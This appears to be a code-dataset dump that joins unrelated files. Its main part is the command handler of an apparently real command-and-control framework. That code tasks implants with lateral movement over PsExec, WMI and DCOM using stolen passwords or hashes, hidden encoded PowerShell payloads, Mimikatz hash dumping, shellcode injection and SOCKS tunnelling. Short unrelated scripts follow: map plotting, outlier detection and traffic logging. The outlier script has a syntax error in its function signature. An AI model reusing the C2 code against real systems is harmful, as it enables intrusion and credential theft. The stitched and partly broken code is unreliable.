if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-psexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-psexecdaisypayload"):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
daisyname = input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-psexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-psexecpayload"):
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecpayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -username %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -username %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload)
new_task(cmd, user, randomuri)
# wmi lateral movement
elif command.startswith("invoke-wmiexec "):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
params = re.compile("invoke-wmiexec ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s" % params
new_task(cmd, user, randomuri)
elif command.startswith("invoke-wmijspbindpayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspbindpayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS_PBind.b64" % (PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
target = re.search("(?<=-target )\\S*", str(cmd), re.IGNORECASE)
C2 = get_c2server_all()
print()
print("To connect to the SMB named pipe use the following command:")
print(Colours.GREEN+"invoke-pbind -target %s -secret mtkn4 -key %s -pname jaccdpqnvbrrxlaf -client" % (target[0],C2[2])+Colours.END)
print()
print("To issue commands to the SMB named pipe use the following command:")
print(Colours.GREEN+"pbind-command \"pwd\""+Colours.END)
print()
print("To load modules to the SMB named pipe use the following command:")
print(Colours.GREEN+"pbind-loadmodule Invoke-Mimikatz.ps1"+Colours.END)
print()
print("To kill the SMB named pipe use the following command:")
print(Colours.GREEN+"pbind-kill"+Colours.END)
elif command.startswith("invoke-wmijsproxypayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
if os.path.isfile(("%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy"))):
with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijsproxypayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, "Proxy")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-wmijsdaisypayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
daisyname = input("Name required: ")
if os.path.isfile(("%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname))):
with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijsdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, daisyname)), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-wmijspayload"):
check_module_loaded("New-JScriptShell.ps1", randomuri, user)
with open("%s%sDotNet2JS.b64" % (PayloadsDirectory, ""), "r") as p:
payload = p.read()
params = re.compile("invoke-wmijspayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in command:
p = re.compile(r"-credid (\w*)")
credId = re.search(p, command)
if credId:
credId = credId.group(1)
else:
startup(user, "Please specify a credid")
creds = get_cred_by_id(credId)
if creds is None:
startup(user, "CredID not found")
params = params.replace("-credid %s" % credId, "")
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
new_task("$Shellcode64=\"%s\" #%s" % (payload, "%s%sDotNet2JS.b64" % (PayloadsDirectory, "")), user, randomuri)
cmd = "new-jscriptshell %s -payload $Shellcode64" % (params)
new_task(cmd, user, randomuri)
elif command.startswith("invoke-wmiproxypayload"):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-wmidaisypayload"):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
daisyname = input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s -command \"%s\"" % (params, payload)
new_task(cmd, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-wmipayload"):
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmipayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params, payload)
new_task(cmd, user, randomuri)
# dcom lateral movement
elif command.startswith("invoke-dcomproxypayload"):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, "Proxy"))):
with open("%s%spayload.bat" % (PayloadsDirectory, "Proxy"), "r") as p:
payload = p.read()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
params = params + " -domain %s -user %s -hash %s" % (creds['Domain'], creds['Username'], creds['Hash'])
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createproxypayload first")
elif command.startswith("invoke-dcomdaisypayload"):
daisyname = input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-dcompayload"):
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
p = re.compile(r'(?<=-target.).*')
target = re.search(p, command).group()
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target, payload)
new_task(pscommand, user, randomuri)
# runas payloads
elif command.startswith("invoke-runas "):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
params = re.compile("invoke-runas ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
cmd = "invoke-runas %s" % params
new_task(cmd, user, randomuri)
elif command.startswith("invoke-runasdaisypayload"):
daisyname = input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory, daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory, daisyname), "r") as p:
payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeDaisy.ps1", randomuri, user)
params = re.compile("invoke-runasdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSDaisy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
else:
startup(user, "Need to run createdaisypayload first")
elif command.startswith("invoke-runasproxypayload"):
C2 = get_c2server_all()
if C2[11] == "":
startup(user, "Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
proxyvar = "$proxypayload = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % payload
new_task(proxyvar, user, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipeProxy.ps1", randomuri, user)
params = re.compile("invoke-runasproxypayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMSProxy'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
elif command.startswith("invoke-runaspayload"):
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
check_module_loaded("NamedPipe.ps1", randomuri, user)
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
params = params.sub("", command)
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if creds['Password']:
params = params + " -domain %s -user %s -pass %s" % (creds['Domain'], creds['Username'], creds['Password'])
else:
startup(user, "invoke-runas does not support hash authentication")
pipe = "add-Type -assembly System.Core; $pi = new-object System.IO.Pipes.NamedPipeClientStream('PoshMS'); $pi.Connect(); $pr = new-object System.IO.StreamReader($pi); iex $pr.ReadLine();"
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params, base64.b64encode(pipe.encode('UTF-16LE')).decode("utf-8"))
new_task(pscommand, user, randomuri)
elif command == "help" or command == "?":
print(posh_help)
elif command == "help 1":
print(posh_help1)
elif command == "help 2":
print(posh_help2)
elif command == "help 3":
print(posh_help3)
elif command == "help 4":
print(posh_help4)
elif command == "help 5":
print(posh_help5)
elif command == "help 6":
print(posh_help6)
elif command == "help 7":
print(posh_help7)
elif command == "help 8":
print(posh_help8)
elif command.startswith("get-pid"):
pid = get_implantdetails(randomuri)
print(pid[8])
elif command.startswith("upload-file"):
source = ""
destination = ""
s = ""
nothidden = False
if command == "upload-file":
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
commandloop(implant_id, user)
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
nothidden = args.nothidden
try:
with open(source, "rb") as source_file:
s = source_file.read()
if s:
sourceb64 = base64.b64encode(s).decode("utf-8")
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
if (nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, nothidden, sourceb64)
else:
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, sourceb64)
new_task(uploadcommand, user, randomuri)
else:
print("Source file could not be read or was empty")
except Exception as e:
print("Error with source file: %s" % e)
traceback.print_exc()
elif command == "kill-implant" or command == "exit":
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print("Implant not terminated")
if ri == "":
new_task("exit", user, randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
new_task("exit", user, randomuri)
kill_implant(randomuri)
elif command.startswith("unhide-implant"):
unhide_implant(randomuri)
elif command.startswith("hide-implant"):
kill_implant(randomuri)
elif command.startswith("migrate"):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, user, params)
elif command.startswith("loadmoduleforce"):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user, force=True)
elif command.startswith("loadmodule"):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, user)
elif command.startswith("pbind-loadmodule"):
params = re.compile("pbind-loadmodule ", re.IGNORECASE)
params = params.sub("", command)
new_task(("pbind-loadmodule %s" % params), user, randomuri)
elif command.startswith("invoke-daisychain"):
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
urls = get_allurls()
new_task("%s -URLs '%s'" % (command, urls), user, randomuri)
print("Now use createdaisypayload")
elif command.startswith("inject-shellcode"):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
commandloop(implant_id, user)
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
arch = "64"
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
elif command == "listmodules":
modules = os.listdir("%s/Modules/" % POSHDIR)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if ".ps1" in mod:
print(mod)
elif command == "modulesloaded":
ml = get_implantdetails(randomuri)
print(ml[14])
elif command == "ps":
new_task("get-processlist", user, randomuri)
elif command == "hashdump":
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
elif command == "stopdaisy":
update_label("", randomuri)
new_task(command, user, randomuri)
elif command == "stopsocks":
update_label("", randomuri)
new_task(command, user, randomuri)
elif command == "sharpsocks":
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = select_item("HostnameIP", "C2Server")
sharpport = select_item("ServerPort", "C2Server")
dfheader = select_item("DomainFrontHeader", "C2Server")
implant = get_implantdetails(randomuri)
pivot = implant[15]
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
if (sharpport != 80 and sharpport != 443):
if (sharpurl.count("/") >= 3):
pat = re.compile(r"(?<!/)/(?!/)")
sharpurl = pat.sub(":%s/" % sharpport, str, 1)
else:
sharpurl = ("%s:%s" % (sharpurl, sharpport))
print(POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
elif command == "history":
startup(user, get_history())
elif command.startswith("reversedns"):
params = re.compile("reversedns ", re.IGNORECASE)
params = params.sub("", command)
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
elif command.startswith("createdaisypayload"):
createdaisypayload(user, startup)
elif command.startswith("createproxypayload"):
params = re.compile("createproxypayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if not creds['Password']:
startup(user, "This command does not support credentials with hashes")
createproxypayload(user, startup, creds)
elif command.startswith("createnewpayload"):
params = re.compile("createnewpayload ", re.IGNORECASE)
params = params.sub("", command)
creds = None
if "-credid" in params:
creds, params = get_creds_from_params(params, startup, user)
if creds is None:
startup(user, "CredID not found")
if not creds['Password']:
startup(user, "This command does not support credentials with hashes")
createproxypayload(user, startup, creds)
else:
if command:
new_task(command, user, randomuri)
return
def migrate(randomuri, user, params=""):
implant = get_implantdetails(randomuri)
implant_arch = implant[10]
implant_comms = implant[15]
if implant_arch == "AMD64":
arch = "64"
else:
arch = "86"
if implant_comms == "PS":
path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR, arch)
shellcodefile = load_file(path)
elif "Daisy" in implant_comms:
daisyname = input("Name required: ")
path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR, daisyname, arch)
shellcodefile = load_file(path)
elif "Proxy" in implant_comms:
path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR, arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\" #%s" % (arch, base64.b64encode(shellcodefile).decode("utf-8"), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
| 51.074026
| 300
| 0.588959
|
266234154c474d11bd5a3899761263d716593b79
| 1,241
|
py
|
Python
|
test/proj4/proj-regression-EPSG-4326-3.py
|
dvuckovic/magics-test
|
bd8baf97b0db986f6adf63700d3cf77bbcbad2f2
|
[
"Apache-2.0"
] | 7
|
2019-03-19T09:32:41.000Z
|
2022-02-07T13:20:33.000Z
|
test/proj4/proj-regression-EPSG-4326-3.py
|
dvuckovic/magics-test
|
bd8baf97b0db986f6adf63700d3cf77bbcbad2f2
|
[
"Apache-2.0"
] | 2
|
2021-03-30T05:37:20.000Z
|
2021-08-17T13:58:04.000Z
|
test/proj4/proj-regression-EPSG-4326-3.py
|
dvuckovic/magics-test
|
bd8baf97b0db986f6adf63700d3cf77bbcbad2f2
|
[
"Apache-2.0"
] | 5
|
2019-03-19T10:43:46.000Z
|
2021-09-09T14:28:39.000Z
|
from Magics.macro import *
import os
def plot_area(epsg, llx, lly, urx, ury):
img = os.path.basename(__file__).split('.')[0]
title = "Projection {} : [{:.2f}, {:.2f}, {:.2f}, {:.2f}]".format(epsg, llx, lly, urx, ury)
#Setting output
png = output(
output_formats = ['png'],
output_name = img,
output_name_first_page_number = 'off')
#Setting the geographical area
area = mmap(
subpage_lower_left_latitude = lly,
subpage_lower_left_longitude = llx,
subpage_map_projection = epsg,
subpage_upper_right_latitude = ury,
subpage_upper_right_longitude = urx,
subpage_map_area_definition = "corners"
)
#Setting the coastlines
background = mcoast(
map_coastline_land_shade = 'on',
map_coastline_resolution = "medium",
map_coastline_land_shade_colour = 'cream')
#Picking the grib metadata
title = mtext(
text_lines = [title],
text_justification = 'left',
text_font_size = 0.6,
text_colour = 'charcoal')
#Plotting
plot(png,area,background,title,)
plot_area("EPSG:4326", -93.1904712370697, 7.324498226008458, -56.86549191675697, 79.97445686663391 )
| 28.860465
| 101
| 0.630137
|
ad4de74b5aa8a62b1f73687922de435f97c9949e
| 1,319
|
py
|
Python
|
ThomsonTau.py
|
BlancaNietoPetinal/Thompson-Tau-Method
|
2d4736ac8f3bef7f10d4e78312f5ff004f0e96a6
|
[
"Unlicense"
] | null | null | null |
ThomsonTau.py
|
BlancaNietoPetinal/Thompson-Tau-Method
|
2d4736ac8f3bef7f10d4e78312f5ff004f0e96a6
|
[
"Unlicense"
] | null | null | null |
ThomsonTau.py
|
BlancaNietoPetinal/Thompson-Tau-Method
|
2d4736ac8f3bef7f10d4e78312f5ff004f0e96a6
|
[
"Unlicense"
] | null | null | null |
import numpy as np
import scipy.stats as ss
def maxim(data):
'''
Calculates de maximum value in a list with nan values
Inputs:
- data: array-like.
Outputs:
- m: int, the maximun value in the array.
- ind: the index of the maximum.
'''
m = 0
ind = 0
for i in range(len(data)):
if not(np.isnan(data[i])) and data[i]>m:
m = data[i]
ind = i
return m,ind
def thompson_tau(data,alpha = 0.05,threshold):
# Information obtained from: https://www.statisticshowto.datasciencecentral.com/modified-thompson-tau-test/
'''
Implements the Thompson Tau method and returns a list with the outliers index.
Inputs:
- data: an array.
- alpha: the significance level, default 0.05.
- Threshold: the number of points tested.
Outputs:
- outliers: a list with the indices of the outliers.
'''
outliers = []
n = len(data)
mean = np.mean(data)
delta = abs(data-mean)
std = np.std(data)
for i in range(threshold):
d,ind = maxim(delta)
reject = ss.t.ppf(alpha/2, n - 2)
tau = (reject*(n - 1))/(np.sqrt(n)*np.sqrt(n - 2 + np.power(reject,2)))
if d > tau*std:
outliers += [ind]
delta[ind] = None
return outliers
# An example to test it
data = np.array([489, 490, 490, 491, 494, 499, 499, 500, 501, 505])
print(thompson_tau(data,0.05,10))
| 26.38
| 109
| 0.639121
|
f10248c5a01558e78e0ee1df39d208b050fb38b1
| 2,830
|
py
|
Python
|
heliosburn/proxy/modules/traffic_reader.py
|
thecodeteam/heliosburn
|
513f6335c9788948d82e5c9285d7869f3ff4cc10
|
[
"MIT"
] | null | null | null |
heliosburn/proxy/modules/traffic_reader.py
|
thecodeteam/heliosburn
|
513f6335c9788948d82e5c9285d7869f3ff4cc10
|
[
"MIT"
] | null | null | null |
heliosburn/proxy/modules/traffic_reader.py
|
thecodeteam/heliosburn
|
513f6335c9788948d82e5c9285d7869f3ff4cc10
|
[
"MIT"
] | 1
|
2020-09-17T18:19:05.000Z
|
2020-09-17T18:19:05.000Z
|
from module import AbstractModule
from twisted.python import log
import json
import redis
from module_decorators import SkipHandler
class TrafficReader(AbstractModule):
"""
Extension of AbstractModule class used to serialize traffic
to a Redis pubsub channel.
"""
def _get_request_message(self, http_message):
request_headers = {k: v for (k, v) in http_message.requestHeaders.
getAllRawHeaders()}
message = {}
message['createdAt'] = http_message.createdAt
message['clientProtocol'] = http_message.clientproto
message['method'] = http_message.method
message['uri'] = http_message.uri
message['path'] = http_message.path
message['args'] = http_message.args
message['headers'] = request_headers
return message
def _get_response_message(self, http_message):
response_headers = {k: v for (k, v) in http_message.responseHeaders.
getAllRawHeaders()}
message = {}
message['createdAt'] = http_message.response_createdAt
message['clientProtocol'] = http_message.clientproto
message['statusCode'] = http_message.code
message['statusDescription'] = http_message.code_message
message['headers'] = response_headers
return message
def _get_traffic_message(self, http_message):
message = {}
message['transaction_id'] = str(http_message.transaction_id)
message['request_id'] = str(http_message.request_id)
message['response_id'] = str(http_message.response_id)
return message
def configure(self, **configs):
self.redis_host = configs['redis_host']
self.redis_port = configs['redis_port']
self.redis_db = configs['redis_db']
self.redis_pub_queue = configs['traffic_pub_queue']
self.redis_client = redis.StrictRedis(host=self.redis_host,
port=self.redis_port,
db=self.redis_db)
@SkipHandler
def handle_request(self, request):
message = self._get_traffic_message(request)
message['request'] = self._get_request_message(request)
self.redis_client.publish(self.redis_pub_queue, json.dumps(message))
log.msg("traffic read: " + str(message))
return request
@SkipHandler
def handle_response(self, response):
message = self._get_traffic_message(response)
message['request'] = self._get_request_message(response)
message['response'] = self._get_response_message(response)
self.redis_client.publish(self.redis_pub_queue, json.dumps(message))
log.msg("traffic read: " + str(message))
return response
traffic_reader = TrafficReader()
| 34.512195
| 76
| 0.652297
|
240be5dabe80dff1c6f319951fcea012ff0b660f
| 42,079
|
py
|
Python
|
tensorflow/python/estimator/training.py
|
Zwysilence/tensorflow
|
b55001be83da044bb21d539d433dec6231eaec55
|
[
"Apache-2.0"
] | 4
|
2021-06-15T17:26:07.000Z
|
2021-11-17T10:58:08.000Z
|
tensorflow/python/estimator/training.py
|
Zwysilence/tensorflow
|
b55001be83da044bb21d539d433dec6231eaec55
|
[
"Apache-2.0"
] | 4
|
2020-09-26T00:55:50.000Z
|
2022-02-10T01:53:06.000Z
|
tensorflow/python/estimator/training.py
|
